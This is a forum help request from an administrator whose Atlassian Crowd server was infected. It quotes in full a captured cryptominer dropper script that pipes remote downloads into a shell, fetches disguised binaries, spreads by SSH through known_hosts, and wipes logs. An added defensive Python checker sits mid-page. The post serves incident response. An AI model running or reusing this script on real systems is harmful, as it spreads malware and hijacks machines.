Crowd susceptible to khugepaged malware as well?

I have been having trouble with my crowd install as of late. The system seems to run out of memory which then kills the crowd java process disallowing anybody to log in. 

I logged into the crowd box this morning and see what seems to be similar behavior that I previously dealt with on an exploited confluence server. 

[root@server-09 crowd]# crontab -l
*/15 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

and 

khugepaged running in /tmp as a non-root user. 

There are also a couple of other anomalous processes running in /tmp as well. 

[root@server-09 crowd]# ll /tmp/
total 8652
-rwxrwxr-x 1 albie albie 2476028 Jul 31 13:38 77a3984c38bb251
-rwxrwxr-x 1 albie albie 2476028 Jul 30 17:28 77a3984c38bb25153
drwxr-xr-x 2 root root 4096 Jul 30 17:29 hsperfdata_root
-rwxr-xr-x 1 albie albie 572376 Jul 30 17:28 khugepaged
-rwxrwxr-x 1 albie albie 2729824 Jul 19 14:27 sshd
-rwxr-xr-x 1 albie albie 572376 Jul 31 13:38 systemd-uduvd 

specifically the 77a3984... processes. Running strace on these leads to

goroutine 1 [running]:
github.com/hippies/LSD/LSDB.KWR(0x6cd9f8, 0xa, 0x7)
/root/go/src/github.com/hippies/LSD/LSDB/a.go:67 +0x3cc
main.main()
/root/go/src/github.com/hippies/LSD/main.go:31 +0x3b1
<unfinished ...>
+++ exited with 2 +++ 

a search of which turns up a result from https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang which seems to say that this is a new variant of the older khugepageds written in golang. 

This is a wholly separate machine from the one that I had the confluence malware issues with (although this *is* the authentication point for the confluence install). 

The aforementioned cron job downloads an index.html with the following contents:

[root@server-09 kerbware]# cat index.html
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp

echo "*/10 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin

*/10 * * * * root (/usr/local/sbin/77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh
EOF

ps -ef |grep "\w\{33\}$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchbog"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bcb$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bcc$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bcd$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bce$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa0$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa1$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa2$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa3$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa4$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "migrations"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "httpdz"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
ps -e|grep -v grep|grep "kerberods"|awk '{print $1}'|xargs kill -9
ps -ef|grep -v grep|grep conflue|grep "/bin/bash$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep conflue|grep "sh rc9$"|awk '{print $2}'|xargs kill -9

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then
chattr -i 77a3984c38bb25153655adf977a1b2
rm -rf 77a3984c38bb25153655adf977a1b2
ARCH=$(getconf LONG_BIT)
if [ ${ARCH}x = "64x" ]; then
(curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190729/2328370e8172416fa255e541d82cb271.png -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q img.sobot.com/chatres/89/msg/20190729/2328370e8172416fa255e541d82cb271.png -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 never.b-cdn.net/x64 -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q never.b-cdn.net/x64 -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407863330/7.9092922123650595.jpg -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407863330/7.9092922123650595.jpg -O 77a3984c38bb25153655adf977a1b2)
else
(curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190729/874455422eb04a8fba265f0fc1e07b83.png -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q img.sobot.com/chatres/89/msg/20190729/874455422eb04a8fba265f0fc1e07b83.png -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 never.b-cdn.net/x32 -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q never.b-cdn.net/x32 -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407896384/9.811805826684886.jpg -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407896384/9.811805826684886.jpg -O 77a3984c38bb25153655adf977a1b2)
fi
fi
chmod +x 77a3984c38bb25153655adf977a1b2
$(pwd)/77a3984c38bb25153655adf977a1b2 || ./77a3984c38bb25153655adf977a1b2 || /usr/bin/77a3984c38bb25153655adf977a1b2 || /usr/libexec/77a3984c38bb25153655adf977a1b2 || /usr/local/bin/77a3984c38bb25153655adf977a1b2 || 77a3984c38bb25153655adf977a1b2 || /tmp/77a3984c38bb25153655adf977a1b2 || /usr/local/sbin/77a3984c38bb25153655adf977a1b2
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
fi

for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
fi
fi
done

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#

Is there a new exploit running around that somehow hit crowd? This *is* an older version of crowd: 2.7.1 but I can't figure out how this might have gotten in. 

Any tips/advice appreciated. 
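An added defender-side check, not code from the post or from Atlassian, that looks for the two indicators the post describes: a cron entry that pipes a curl/wget download straight into a shell, and executables dropped in /tmp under daemon look-alike or hex-string names. The sample crontab and `ls -l /tmp` text are constructed from the listings above plus one benign cron job; the name patterns are assumptions drawn from those listings.

```python
import re

# Cron entry shape seen on the compromised host: fetch a script from a remote
# host with curl or wget and pipe whatever comes back straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")
# Names the dropped /tmp binaries hid behind: kernel/system daemon look-alikes
# (none of which legitimately live in /tmp) and long hex-string file names.
DECOY_NAMES = {"khugepaged", "sshd", "systemd-uduvd"}
HEX_NAME = re.compile(r"^[0-9a-f]{15,32}$")

def suspicious_cron_entries(crontab_text):
    """Return the cron lines that pipe a remote download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        # skip blanks, comments and env assignments such as SHELL=/bin/bash
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if PIPE_TO_SHELL.search(line):
            hits.append(line)
    return hits

def suspicious_tmp_entries(ls_output):
    """Return (name, owner) for executables in an `ls -l` listing that match the decoy naming."""
    hits = []
    for line in ls_output.splitlines():
        parts = line.split()
        if len(parts) < 9 or not parts[0].startswith("-"):
            continue  # skips the 'total' line and directories
        mode, owner, name = parts[0], parts[2], parts[8]
        if "x" in mode and (name in DECOY_NAMES or HEX_NAME.match(name)):
            hits.append((name, owner))
    return hits

# Constructed samples: the listings from the post plus one benign cron job.
SAMPLE_CRONTAB = """\
*/15 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh
0 3 * * * /usr/bin/certbot renew --quiet
"""
SAMPLE_TMP_LISTING = """\
total 8652
-rwxrwxr-x 1 albie albie 2476028 Jul 31 13:38 77a3984c38bb251
-rwxrwxr-x 1 albie albie 2476028 Jul 30 17:28 77a3984c38bb25153
drwxr-xr-x 2 root root 4096 Jul 30 17:29 hsperfdata_root
-rwxr-xr-x 1 albie albie 572376 Jul 30 17:28 khugepaged
-rwxrwxr-x 1 albie albie 2729824 Jul 19 14:27 sshd
-rwxr-xr-x 1 albie albie 572376 Jul 31 13:38 systemd-uduvd
"""
```

Run both functions over the real `crontab -l`, `/etc/crontab` and `ls -l /tmp` output of a host to get the same two lists; the benign certbot line and the hsperfdata_root directory are left out.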

1 answer

1 accepted

@kuromiya is anyone interested in how my crowd installation got infected with malware?

edit: question re-posed here: https://community.atlassian.com/t5/Crowd-questions/Crowd-infected-with-malware
